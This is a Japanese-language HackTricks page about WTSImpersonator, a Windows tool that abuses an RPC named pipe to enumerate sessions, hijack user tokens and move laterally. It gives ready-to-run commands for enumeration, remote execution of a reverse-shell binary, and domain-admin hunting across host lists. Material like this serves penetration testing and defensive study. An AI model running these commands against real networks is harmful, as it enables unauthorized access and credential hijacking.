mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
3.8 KiB
3.8 KiB
ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksのグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見る
- 💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦でフォローする:@carlospolopm。
- ハッキングトリックを共有するためにPRを提出して HackTricks と HackTricks Cloud のGitHubリポジトリに。
WTS Impersonatorツールは、"\pipe\LSM_API_service" RPC名前付きパイプを悪用して、ログインしているユーザーを秘密裏に列挙し、トークンを乗っ取り、従来のトークン権限昇格技術をバイパスします。このアプローチにより、ネットワーク内でのシームレスな横断移動が可能となります。この技術の革新は、Omri Basoによるもので、その作業はGitHubでアクセス可能です。
コア機能
このツールは、一連のAPI呼び出しを介して動作します:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
キー モジュールと使用方法
- ユーザーの列挙: ツールを使用して、ローカルおよびリモートユーザーの列挙が可能です。それぞれのシナリオに対応するコマンドを使用します:
- ローカルでの実行:
.\WTSImpersonator.exe -m enum
- IPアドレスまたはホスト名を指定してリモートでの実行:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- コマンドの実行:
exec
およびexec-remote
モジュールは、Service コンテキストが必要です。ローカル実行では、WTSImpersonator実行可能ファイルとコマンドが必要です: - ローカルコマンドの実行例:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- サービスコンテキストを取得するために PsExec64.exe を使用できます:
.\PsExec64.exe -accepteula -s cmd.exe
- リモートコマンドの実行: PsExec.exe と同様に、適切な権限で実行を許可するサービスをリモートで作成およびインストールします。
- リモート実行の例:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- ユーザーハンティングモジュール: 複数のマシンで特定のユーザーをターゲットにし、彼らの資格情報でコードを実行します。これは、複数のシステムでローカル管理者権限を持つドメイン管理者をターゲットにする際に特に有用です。
- 使用例:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe